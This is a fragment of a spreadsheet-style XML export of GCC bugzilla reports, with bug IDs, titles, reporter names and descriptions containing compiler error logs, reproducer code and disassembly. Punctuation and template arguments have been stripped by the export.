--enable-languages=cc++javaf95objcadatreelang --prefix=/usr
--enable-shared --with-system-zlib --libexecdir=/usr/lib --enable-nls
--without-included-gettext --enable-threads=posix --program-suffix=-4.0
--enable-__cxa_atexit --enable-libstdcxx-allocator=mt --enable-clocale=gnu
--enable-libstdcxx-debug --enable-java-gc=boehm --enable-java-awt=gtk
--with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.0-1.4.2.0/jre --enable-mpfr
--disable-werror --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.0.1 (Debian 4.0.1-2)
 /usr/lib/gcc/i486-linux-gnu/4.0.1/cc1plus -E -quiet -v -D_GNU_SOURCE temp.cpp
-mtune=i486 -fmessage-length=80 -fpch-preprocess -o temp.ii
ignoring nonexistent directory /usr/local/include/i486-linux-gnu
ignoring nonexistent directory /usr/include/i486-linux-gnu
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/i486-linux-gnu/4.0.1/../../../../include/c++/4.0.1
 /usr/lib/gcc/i486-linux-gnu/4.0.1/../../../../include/c++/4.0.1/i486-linux-gnu
 /usr/lib/gcc/i486-linux-gnu/4.0.1/../../../../include/c++/4.0.1/backward
 /usr/local/include
 /usr/lib/gcc/i486-linux-gnu/4.0.1/include
 /usr/include
End of search list.
 /usr/lib/gcc/i486-linux-gnu/4.0.1/cc1plus -fpreprocessed temp.ii -quiet
-dumpbase temp.cpp -mtune=i486 -auxbase temp -version -fmessage-length=80 -o temp.s
GNU C++ version 4.0.1 (Debian 4.0.1-2) (i486-linux-gnu)
        compiled by GNU C version 4.0.1 (Debian 4.0.1-2).
GGC heuristics: --param ggc-min-expand=47 --param ggc-min-heapsize=32148
/usr/lib/gcc/i486-linux-gnu/4.0.1/../../../../include/c++/4.0.1/tr1/hashtable: In
   member function 'typename std::tr1::hashtable&lt;Key Value Allocator
   ExtractKey Equal H1 H2 H RehashPolicy cache_hash_code
   mutable_iterators unique_keys&gt;::const_iterator std::tr1::hashtable&lt;Key
   Value Allocator ExtractKey Equal H1 H2 H RehashPolicy
   cache_hash_code mutable_iterators unique_keys&gt;::find(const Key&amp;) const
   [with Key = int Value = int Allocator = std::allocator ExtractKey =
   Internal::identity Equal = std::equal_to H1 =
   std::tr1::hash H2 = Internal::mod_range_hashing H =
   Internal::default_ranged_hash RehashPolicy = Internal::prime_rehash_policy
   bool cache_hash_code = false bool mutable_iterators = false bool
   unique_keys = true]':
temp.cpp:9:   instantiated from here
/usr/lib/gcc/i486-linux-gnu/4.0.1/../../../../include/c++/4.0.1/tr1/hashtable:1135:
error: passing
   'const std::tr1::hashtable
   Internal::identity std::equal_to std::tr1::hash
   Internal::mod_range_hashing Internal::default_ranged_hash
   Internal::prime_rehash_policy false false true&gt;' as 'this' argument of '
   typename std::tr1::hashtable&lt;Key Value Allocator ExtractKey Equal H1
   H2 H RehashPolicy cache_hash_code mutable_iterators unique_keys&gt;::node*
   std::tr1::hashtable&lt;Key Value Allocator ExtractKey Equal H1 H2 H
   RehashPolicy cache_hash_code mutable_iterators
   unique_keys&gt;::find_node(Internal::hash_node* const
   Key&amp; typename std::tr1::hashtable&lt;Key Value Allocator ExtractKey Equal
   H1 H2 H RehashPolicy cache_hash_code mutable_iterators
   unique_keys&gt;::hash_code_t) [with Key = int Value = int Allocator =
   std::allocator ExtractKey = Internal::identity Equal =
   std::equal_to H1 = std::tr1::hash H2 =
   Internal::mod_range_hashing H = Internal::default_ranged_hash RehashPolicy
   = Internal::prime_rehash_policy bool cache_hash_code = false bool
   mutable_iterators = false bool unique_keys = true]' discards qualifiers</t>
  </si>
  <si>
    <t>evilalias</t>
  </si>
  <si>
    <t>GCC-65414</t>
  </si>
  <si>
    <t>[5 Regression] ICE while building libgcc after stage 2 bootstrap failure on aarch64-linux-gnu</t>
  </si>
  <si>
    <t>seen with r221296
https://launchpadlibrarian.net/200077696/buildlog_ubuntu-vivid-arm64.gcc-5_5-20150312-1ubuntu11_BUILDING.txt.gz
make[6]: Leaving directory '/build/buildd/gcc-5-5-20150312/build/aarch64-linux-gnu/libgcc'
/build/buildd/gcc-5-5-20150312/build/./gcc/xgcc -B/build/buildd/gcc-5-5-20150312/build/./gcc/ -B/usr/aarch64-linux-gnu/bin/ -B/usr/aarch64-linux-gnu/lib/ -isystem /usr/aarch64-linux-gnu/include -isystem /usr/aarch64-linux-gnu/sys-include -isystem /build/buildd/gcc-5-5-20150312/build/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC    -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fPIC -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fPIC -I. -I. -I../.././gcc -I../../../src/libgcc -I../../../src/libgcc/. -I../../../src/libgcc/../gcc -I../../../src/libgcc/../include  -DHAVE_CC_TLS  -o _clear_cache.o -MT _clear_cache.o -MD -MP -MF _clear_cache.dep -DL_clear_cache -c ../../../src/libgcc/libgcc2.c -fvisibility=hidden -DHIDE_EXPORTS
In file included from ../.././gcc/tconfig.h:8:0
                 from ../../../src/libgcc/libgcc2.c:26:
../../../src/libgcc/../include/ansidecl.h:1:0: internal compiler error: Segmentation fault
 /* ANSI and traditional C compatability macros
 ^
In file included from ../.././gcc/tconfig.h:8:0
                 from ../../../src/libgcc/libgcc2.c:26:
../../../src/libgcc/../include/ansidecl.h:1:0: internal compiler error: Segmentation fault
 /* ANSI and traditional C compatability macros
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
In file included from ../.././gcc/tconfig.h:8:0
                 from ../../../src/libgcc/libgcc2.c:26:
../../../src/libgcc/../include/ansidecl.h:1:0: internal compiler error: Segmentation fault
 /* ANSI and traditional C compatability macros
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Makefile:466: recipe for target '_muldi3.o' failed
make[5]: *** [_muldi3.o] Error 1
make[5]: *** Waiting for unfinished jobs....
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Makefile:466: recipe for target '_negdi2.o' failed
make[5]: *** [_negdi2.o] Error 1
Makefile:466: recipe for target '_ashrdi3.o' failed
make[5]: *** [_ashrdi3.o] Error 1
Makefile:466: recipe for target '_ashldi3.o' failed
make[5]: *** [_ashldi3.o] Error 1
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-10905</t>
  </si>
  <si>
    <t>Empty report.</t>
  </si>
  <si>
    <t>arend.bayer</t>
  </si>
  <si>
    <t>GCC-43190</t>
  </si>
  <si>
    <t>[4.4 Regression] Used pointer typedefs eliminated from debug info</t>
  </si>
  <si>
    <t>// { dg-options -gdwarf-2 -dA }
// { dg-final { scan-assembler DW_TAG_structure_type\[^\\r\\n\]*\[\\r\\n\]+\[^\\r\\n\]*\S\[^\\r\\n\]*DW_AT_name } }
// { dg-final { scan-assembler DW_TAG_typedef\[^\\r\\n\]*\[\\r\\n\]+\[^\\r\\n\]*\T\[^\\r\\n\]*DW_AT_name } }
typedef struct S { int i } *T
#define M(p) ((T) (p))
void
foo (void *p)
{
  M (p)-&gt;i++
}
used to work in 3.2 (the T typedef has been emitted into debug info) but doesn't work in 4.3/4.4/4.5.</t>
  </si>
  <si>
    <t>GCC-30303</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with invalid constructor definition</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline and 4.2 branch:
==================================
class A
{
  int i
}
A::A() { A() }
==================================
bug.cc:6: error: definition of implicitly-declared 'A::A()'
bug.cc:6: error: declaration of 'A::A()' throws different exceptions
bug.cc:2: error: from previous declaration 'A::A() throw ()'
bug.cc: In constructor 'A::A()':
bug.cc:6: internal compiler error: in finish_function at cp/decl.c:11162
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-35190</t>
  </si>
  <si>
    <t>Wrong branch instruction with -freorder-blocks-and-partition on SH</t>
  </si>
  <si>
    <t>On SH gcc.dg/tree-prof/bb-reorg.c test fails with assembler
messages like:
/tmp/cc3RtxMk.s: 115: Error: displacement to defined symbol .L27 overflows 12-bit field
It happens with a branch from .text to .text.unlikely section
where the label .L27 is placed on.
I've found that bb-reorder makes crossing unconditional branches
into indirect jumps when the architecture doesn't have unconditional
branches that can span all of memory.  This is the case for SH and
the rtls for the above branch in .bbpart rtl dump look like:
(insn 172 156 173 10 (set (reg:SI 211)
        (label_ref:SI 155)) -1 (insn_list:REG_LABEL_OPERAND 155 (nil)))
(jump_insn 173 172 159 10 (set (pc)
        (reg:SI 211)) -1 (expr_list:REG_CROSSING_JUMP (nil)
        (nil)))
which will be assembled to the correct jmup instruction across
sections on this target.
It seems that local-alloc.c:update_equiv_regs replaces this
indirect jump back into a usual jump.  The corresponding part
of .lreg dump is
(jump_insn:HI 173 156 159 13 (set (pc)
        (label_ref:SI 155)) 219 {jump_compact} (expr_list:REG_CROSSING_JUMP (nil)
        (nil)))
which is assembled to a bad short branch instruction on SH.
I'm testing the patch below though SH has a separate issue with
constant pools for bb-reorg.c test.
--- ORIG/trunk/gcc/local-alloc.c	2008-01-17 09:41:36.000000000 +0900
+++ TMP/trunk/gcc/local-alloc.c	2008-02-14 11:14:04.000000000 +0900
@@ -11077 +11078 @@ update_equiv_regs (void)
 	  /* Don't substitute into a non-local goto this confuses CFG.  */
 	  if (JUMP_P (insn)
-	      &amp;&amp; find_reg_note (insn REG_NON_LOCAL_GOTO NULL_RTX))
+	      &amp;&amp; (find_reg_note (insn REG_NON_LOCAL_GOTO NULL_RTX)
+		  || find_reg_note (insn REG_CROSSING_JUMP NULL_RTX)))
 	    continue
 	  for (link = REG_NOTES (insn) link link = XEXP (link 1))</t>
  </si>
  <si>
    <t>GCC-28045</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Bitfield &amp;&amp; and optimization =&gt; bad code generation</t>
  </si>
  <si>
    <t>This is a stripped-down bit of code representing a bad code generation problem we've been having with XEmacs 21.5 + gcc 4.X + optimization.  I can reproduce with Fedora Core 5's packaging of gcc 4.1.1 on the x86_64 platform and with Ubuntu's packaging of gcc 4.0.3 on the i386 platform.
Compile the following code without optimization and it reports that the negation of 1 is -1 which is in bounds.  Compile with any -O flag (confirmed for -O -O2 -O3 and -Os) and the code reports that the negation of 1 is -1 which is out of bounds.  If I break the &amp;&amp; expression up into 2 consecutive if statements to see which bound is supposedly violated the optimized code reports that -1 is within each bound individually.
Things that have no effect: int/long are interchangeable the size of the tag bitfield doesn't seem to matter so long as the tag size and the val size add up to INT_BITS.
I also tried compiling with all of the flags turned on by -O but without -O itself.  Good code is generated in that case.
#include 
#define INT_BITS (sizeof(int) * 8)
#define MAX_VALUE (int)((1UL &lt;&lt; (INT_BITS - 2)) - 1UL)
#define MIN_VALUE (-MAX_VALUE - 1)
struct tagged_int
{
  int tag: 2
  int val: INT_BITS - 2
}
static void
negate (struct tagged_int accum)
{
  printf (min = %d max = %d\n MIN_VALUE MAX_VALUE)
  printf (The negation of 1 is %d which is  -(int)accum.val)
  if (-(int)accum.val = MIN_VALUE) {
    puts (in bounds.)
  } else {
    puts (out of bounds.)
  }
}
int
main ()
{
  struct tagged_int obj
  obj.tag = 0
  obj.val = 1L
  negate(obj)
  return 0
}</t>
  </si>
  <si>
    <t>Jerry.James</t>
  </si>
  <si>
    <t>GCC-10687</t>
  </si>
  <si>
    <t>[3.3] Typo in mips/linux.h</t>
  </si>
  <si>
    <t>There's a one-character typo in config/mips/linux.h the fix
was queued up with the merge from the mips-rewrite branch
so it was never submitted for 3.3.  It causes the C compiler
to set c_language=clk_cplusplus which is surprisingly
harmless and to define -D_GNU_SOURCE by default which
isn't.
        /* The GNU C++ standard library requires this.  */      \
-       if (c_language = clk_cplusplus)                         \
+       if (c_language == clk_cplusplus)                        \
Release:
3.3 CVS branch</t>
  </si>
  <si>
    <t>drow</t>
  </si>
  <si>
    <t>GCC-79350</t>
  </si>
  <si>
    <t>explicit deduction guides don't work</t>
  </si>
  <si>
    <t>When I compile the following code with gcc-7-20170122
template struct S {}
template
explicit S(T) -&gt; S
I get the error 
error: decl-specifier in declaration of deduction guide
 explicit S(T) -&gt; S
 ^~~~~~~~
test.cpp:3:1: error: â€˜explicitâ€™ outside class declaration
This is currently a bug because the current standard draft N4618 allows an optional explicit in the deduction-guide grammar production</t>
  </si>
  <si>
    <t>GCC-48582</t>
  </si>
  <si>
    <t>[C++0x] [DR 342] Template non-type arguments doesn't accept null pointer constant value</t>
  </si>
  <si>
    <t>According to current C++0x draft 14.3.2 [temp.arg.nontype]
template non-type arguments can be a constant expression that evaluates to a null pointer value or null member pointer value.
This change was made in n1905.
So the following code is well-formed.
template  void f() { }
int main()
{
    f() 
    f() 
    f() 
    constexpr void * ptr = nullptr 
    f() 
}
But current gcc does not accept it.
Or is this just unimplemented feature?</t>
  </si>
  <si>
    <t>boostcpp</t>
  </si>
  <si>
    <t>GCC-65270</t>
  </si>
  <si>
    <t>[5 regression] issues with merging memory accesses from different code paths</t>
  </si>
  <si>
    <t>As discussed here https://gcc.gnu.org/ml/gcc-patches/2015-03/msg00028.html
$ more t.c
struct a 
{
  int a[100000]
}
__attribute__ ((aligned (32)))
struct b 
{
  int a[100000]
}
t2(struct a *a)
{
  int i
  for (i=0i&lt;100000i++)
    a-&gt;a[i]++
}
t(struct b *a)
{
  int i
  for (i=0i&lt;100000i++)
    a-&gt;a[i]++
}
$ ./xgcc -B ./ -O3 t.c -flto -c  -fno-inline 
t.c:10:1: warning: return type defaults to ÄÅ¼ËintÄÅ¼Ë [-Wimplicit-int]
 t2(struct a *a)
 ^
t.c:16:1: warning: return type defaults to ÄÅ¼ËintÄÅ¼Ë [-Wimplicit-int]
 t(struct b *a)
 ^
$ ./xgcc -B ./ -O3 t.o -flto  -r -nostdlib
$ objdump a.out -d
a.out:     file format elf64-x86-64
Disassembly of section .text:
0000000000000000 :
   0:   48 8d 87 80 1a 06 00    lea    0x61a80(%rdi)%rax
   7:   66 0f 6f 0d 00 00 00    movdqa 0x0(%rip)%xmm1        # f 
   e:   00 
   f:   90                      nop
  10:   48 83 c7 10             add    $0x10%rdi
  14:   66 0f 6f 47 f0          movdqa -0x10(%rdi)%xmm0
  19:   66 0f fe c1             paddd  %xmm1%xmm0
  1d:   0f 29 47 f0             movaps %xmm0-0x10(%rdi)
  21:   48 39 c7                cmp    %rax%rdi
  24:   75 ea                   jne    10 
  26:   f3 c3                   repz retq 
  28:   0f 1f 84 00 00 00 00    nopl   0x0(%rax%rax1)
  2f:   00 
0000000000000030 :
  30:   e9 00 00 00 00          jmpq   35 
The functions t and t2 are incorrectly unified.</t>
  </si>
  <si>
    <t>GCC-38311</t>
  </si>
  <si>
    <t>ssp-2.c fails on darwin because of duplicated symbols</t>
  </si>
  <si>
    <t>output is:
/usr/libexec/gcc/i686-apple-darwin8/4.0.1/ld: warning multiple definitions of symbol ___stack_chk_fail^M
/var/tmp//ccJIbRl1.o definition of ___stack_chk_fail in section (__TEXT__text)^M
/Users/apinski/src/gcc-sony/gcc-4.3/test/install/dd/lib/gcc/i386-apple-darwin8.11.1/4.3.2/../../../libssp.dylib(single module) definition of ___stack_chk_fail^M
We should pass -Wl-multiply_definedsuppress as an option to suppress about these symbols since we can ignore them here.</t>
  </si>
  <si>
    <t>GCC-4516</t>
  </si>
  <si>
    <t>[SH] sh-unknown-linux-gnu: big jump table</t>
  </si>
  <si>
    <t>make bootstrap fails.
The compiler miscomiples expr.c and fold-const.c with -O0.
With -mbigtable it  does not miscompile.
With -ON (N&gt;=1) it does not miscompile.
It does miscompile because there's no validation for value of jump table.
When it's bigger than 32767 at runtime it goes completly
different place.
Release:
3.0.1 or mainline
Environment:
sh-unknown-linux-gnu
Debain GNU/Linux (unstable)
How-To-Repeat:
make bootstrap</t>
  </si>
  <si>
    <t>gniibe</t>
  </si>
  <si>
    <t>GCC-5096</t>
  </si>
  <si>
    <t>Internal compiler error in finish_function at  ../gcc/cp/decl.c:14422</t>
  </si>
  <si>
    <t>Compiler complained about internal error.
COMPILER OUTPUT:
g++ -v -save-temps test_remap.cc remap.cc index_cat.cc -o test_remap 
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.0)
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -v -D__GNUC__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ test_remap.cc test_remap.ii
GNU CPP version 2.96 20000731 (Red Hat Linux 7.0) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus test_remap.ii -quiet -dumpbase test_remap.cc -version -o test_remap.s
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.0).
 as -V -Qy -o test_remap.o test_remap.s
GNU assembler version 2.10.90 (i386-redhat-linux) using BFD version 2.10.0.18
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -v -D__GNUC__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ remap.cc remap.ii
GNU CPP version 2.96 20000731 (Red Hat Linux 7.0) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus remap.ii -quiet -dumpbase remap.cc -version -o remap.s
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.0).
remap.cc: In method `float Remap::remap (float)':
remap.cc:137: parse error before `}'
remap.cc:137: Internal error #122.
remap.cc:137: Internal compiler error in finish_function at 
../gcc/cp/decl.c:14422
Please submit a full bug report.
See  for instructions.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -v -D__GNUC__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ index_cat.cc index_cat.ii
GNU CPP version 2.96 20000731 (Red Hat Linux 7.0) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus index_cat.ii -quiet -dumpbase index_cat.cc -version -o index_cat.s
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.0).
index_cat.cc: In method `void Index_cat::insert (Index_report)':
index_cat.cc:33: `class Index_report' has no member named `pirep_val'
index_cat.cc:38: `class Index_report' has no member named `pirep_val'
index_cat.cc: In method `void Index_cat::insert (Index_report int 
int)':
index_cat.cc:54: `class Index_report' has no member named `pirep_val'
Compilation exited abnormally with code 1 at Wed Dec 12 11:42:51
Release:
g++ 2.96
Environment:
Linux turb 2.2.17-8enterprise #1 SMP Fri Nov 17 16:02:20 EST 2000 i686 unknown
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.0).
How-To-Repeat:
g++ -v -save-temps test_remap.cc remap.cc index_cat.cc -o test_remap</t>
  </si>
  <si>
    <t>gerry</t>
  </si>
  <si>
    <t>GCC-70450</t>
  </si>
  <si>
    <t>[6 Regression] Wrong code with -O0 and -O1.</t>
  </si>
  <si>
    <t>Created attachment 38127
Reproducer.
Test case produces incorrect result with -O0 and -O1 on all x86 arch. Everything works fine with gcc version 4.9.4 20160325 (prerelease) (Revision=234483) and gcc version 5.3.1 20160325 (Revision=234483).
Output:
&gt; g++ repr.cpp -o out -O2 -mavx2 ./out
18446744073709551584
&gt; g++ repr.cpp -o out -O0 -mavx2 ./out
68719476704
GCC version:
&gt; g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/export/users/vlivinsk/gcc-trunk/bin/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /export/users/vlivinsk/gcc-trunk/gcc/configure --with-arch=corei7 --with-cpu=corei7 --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --enable-cloog-backend=isl --with-fpmath=sse --enable-checking=release --enable-languages=cc++lto --with-gmp=/export/users/vlivinsk/gcc-trunk/gmp-6.1.0/bin --with-mpfr=/export/users/vlivinsk/gcc-trunk/mpfr-3.1.3/bin --with-mpc=/export/users/vlivinsk/gcc-trunk/mpc-1.0.3/bin --prefix=/export/users/vlivinsk/gcc-trunk/bin
Thread model: posix
gcc version 6.0.0 20160330 (experimental) (Revision=234545)
Testcase:
#include 
unsigned long int a = 2UL
int b = 2
unsigned long int c = 2UL
void foo () {
    c = 2 * ((2 * a) * (2 * (-b)))
}
int main () {
    foo()
    if (c != 18446744073709551584UL)
        abort()
    return 0
}</t>
  </si>
  <si>
    <t>vsevolod.livinskij</t>
  </si>
  <si>
    <t>GCC-47930</t>
  </si>
  <si>
    <t>-marm is undocumented driver accepts -mno-thumb</t>
  </si>
  <si>
    <t>According to the resolution of Bug 47535 the opposite of -mthumb on ARM platforms should be -marm not -mno-thumb.
However -marm is undocumented both in the arm.opt file (it's marked as Undocumented) and in invoke.texi (except in the ARM Options list.)
Moreover the compiler accepts -mno-thumb (-mthumb is not marked RejectNegative in arm.opt.)</t>
  </si>
  <si>
    <t>GCC-10022</t>
  </si>
  <si>
    <t>Preprocessor failure when using '-MMD' flag with gcc 3.1 on Mac OSX</t>
  </si>
  <si>
    <t>When attempting to compile a simple example using the '-MMD' flag for gcc 3.1 no output is produced and the preprocessor exits with an error.  This does not happen with either g77 (installed via fink) g++ or gcc2 (2.95.2) on my Mac or with gcc 3.0.3 on Sparc Solaris 2.8 or with gcc 3.2.1 on an Athlon 2000+ running RedHat 7.3.  The similar '-MD' flag works correctly using gcc 3.1 on the Mac.  It appears that the preprocessor is attempting to read the object file (which does not yet exist).  It does not matter whether the source file has non-system include files (which would be listed in the '.d' file).  I have the same problem on my Pismo PowerBook as on the machine described here.  Please let me know if this bug should be filed with Apple rather than GNU.  Pasted below are the compiler messages when attempting to compile a simple example:
gcc -v -save-temps -MMD -fPIC -c -o c_hello.o c_hello.c
Reading specs from /usr/libexec/gcc/darwin/ppc/3.1/specs
Thread model: posix
Apple Computer Inc. GCC version 1175 based on gcc version 3.1 20020420 (prerelease)
 /usr/libexec/gcc/darwin/ppc/cpp-precomp -smart -arch ppc -lang-c -v -MMD c_hello.d -MQ c_hello.o -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__APPLE_CC__=1175 -D__ppc__ -D__POWERPC__ -D__NATURAL_ALIGNMENT__ -D__MACH__ -D__BIG_ENDIAN__ -D__APPLE__ -D__ppc__ -D__POWERPC__ -D__NATURAL_ALIGNMENT__ -D__MACH__ -D__BIG_ENDIAN__ -D__APPLE__ -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D__DYNAMIC__ c_hello.c -isystem /usr/include/gcc/darwin/3.1 -ispecs=/usr/libexec/gcc/darwin/ppc/3.1/specs -D__SIZE_TYPE__=long unsigned int -D__PTRDIFF_TYPE__=int -D__WCHAR_TYPE__=int -D__WINT_TYPE__=unsigned int c_hello.i
Apple cpp-precomp 6.14 (devkit-213/devkit_tools-214)
cpp-precomp: could not open 'c_hello.o'
Release:
Apple Computer Inc. GCC version 1175 based on gcc version 3.1 20020420 (prerelease)
Environment:
Mac OSX 10.2.4 350 MHz G3 896 MB RAM 12 GB HD
How-To-Repeat:
Compile a simple sample code using the '-MMD' flag.</t>
  </si>
  <si>
    <t>willic3</t>
  </si>
  <si>
    <t>GCC-67925</t>
  </si>
  <si>
    <t>docs lie about being unable to inline function call before definition</t>
  </si>
  <si>
    <t>Here https://gcc.gnu.org/onlinedocs/gcc-5.2.0/gcc/Inline.html it says:
Some calls cannot be integrated for various reasons (in particular calls that precede the function's definition cannot be integrated (...)).. However since several releases of GCC this in no longer true as shown in the example:
$ ./gcc --version
gcc (GCC) 6.0.0 20151004 (experimental)
Copyright (C) 2015 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ cat bug.c
#include 
#include 
inline static void def(void)
int main(void)
{
        def()
        exit(0)
}
static void def(void)
{
        puts(blah blah)
}
$ ./gcc bug.c -O2 -S
$ cat bug.s
        .file   bug.c
        .section        .rodata.str1.1aMS@progbits1
.LC0:
        .string blah blah
        .section        .text.startupax@progbits
        .p2align 415
        .globl  main
        .type   main @function
main:
.LFB21:
        .cfi_startproc
        movl    $.LC0 %edi
        subq    $8 %rsp
        .cfi_def_cfa_offset 16
        call    puts
        xorl    %edi %edi
        call    exit
        .cfi_endproc
.LFE21:
        .size   main .-main
        .ident  GCC: (GNU) 6.0.0 20151004 (experimental)
        .section        .note.GNU-stack@progbits
The same happens with -O1 and on older versions of GCC such as 4.9.2. I think that this outdated piece of documentation should be removed.</t>
  </si>
  <si>
    <t>arkadiusz</t>
  </si>
  <si>
    <t>GCC-37906</t>
  </si>
  <si>
    <t>has_trivial_default_constructor vs. deleted copy ctor</t>
  </si>
  <si>
    <t>The following:
#include 
struct b
{
  b() = default
  b(const b
}
void test01()
{
  typedef b	test_type
  // typedef std::is_standard_layout standard_layout_p
  typedef std::has_trivial_default_constructor ctor_p
  typedef std::has_trivial_destructor dtor_p
  // static_assert(standard_layout_p::value not standard_layout)
  static_assert(ctor_p::value default ctor not trivial)
  static_assert(dtor_p::value dtor not trivial)
}
Gives:
%$bld/H-x86-gcc.20081020/bin/g++ -std=gnu++0x -c standard_layout.cc
standard_layout.cc: In function 'void test01()':
standard_layout.cc:40: error: static assertion failed: default ctor not trivial
Removing the copy constructor makes the error go away.</t>
  </si>
  <si>
    <t>GCC-43688</t>
  </si>
  <si>
    <t>ICE: in analyze_function at ipa-reference.c:733 with -fipa-reference</t>
  </si>
  <si>
    <t>Command line:
gfortran -fipa-reference testcase.f90
Tested revisions:
r158095 - crash
Output:
$ /mnt/svn/gcc-trunk/binary-158095-lto-fortran/bin/gfortran -fipa-reference testcase.f90
testcase.f90: In function sub:
testcase.f90:8:0: internal compiler error: in analyze_function at ipa-reference.c:733
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-77355</t>
  </si>
  <si>
    <t>FAIL: jit.dg/test-threads.c: error: static declaration of 'dejagnu_pass' follows non-static declaration</t>
  </si>
  <si>
    <t>I'm seeing the following compilation errors on recent trunk of GCC 7.0 while compiling the jit.dg/test-threads.c file:
$ sed -n /spawn .*test-threads\.c//FAIL: jit.dg\/test-threads.c/p /build/gcc-49905/gcc/testsuite/jit/jit.log
spawn -ignore SIGHUP /home/msebor/build/gcc-49905/gcc/xgcc -B/home/msebor/build/gcc-49905/gcc/ /src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c -fno-diagnostics-show-caret -fdiagnostics-color=never -I/src/gcc/49905/gcc/testsuite/../jit -lgccjit -g -Wall -Werror -Wl--export-dynamic -lpthread -fgnu89-inline -lm -o test-threads.c.exe
In file included from /src/gcc/49905/gcc/testsuite/jit.dg/test-accessing-struct.c:6:0
                 from /src/gcc/49905/gcc/testsuite/jit.dg/all-non-failing-tests.h:14
                 from /src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:82:
/src/gcc/49905/gcc/testsuite/jit.dg/harness.h:25:14: error: static declaration of 'dejagnu_pass' follows non-static declaration
/src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:23:6: note: previous declaration of 'dejagnu_pass' was here
In file included from /src/gcc/49905/gcc/testsuite/jit.dg/test-accessing-struct.c:6:0
                 from /src/gcc/49905/gcc/testsuite/jit.dg/all-non-failing-tests.h:14
                 from /src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:82:
/src/gcc/49905/gcc/testsuite/jit.dg/harness.h:26:14: error: static declaration of 'dejagnu_fail' follows non-static declaration
/src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:24:6: note: previous declaration of 'dejagnu_fail' was here
In file included from /src/gcc/49905/gcc/testsuite/jit.dg/test-accessing-struct.c:6:0
                 from /src/gcc/49905/gcc/testsuite/jit.dg/all-non-failing-tests.h:14
                 from /src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:82:
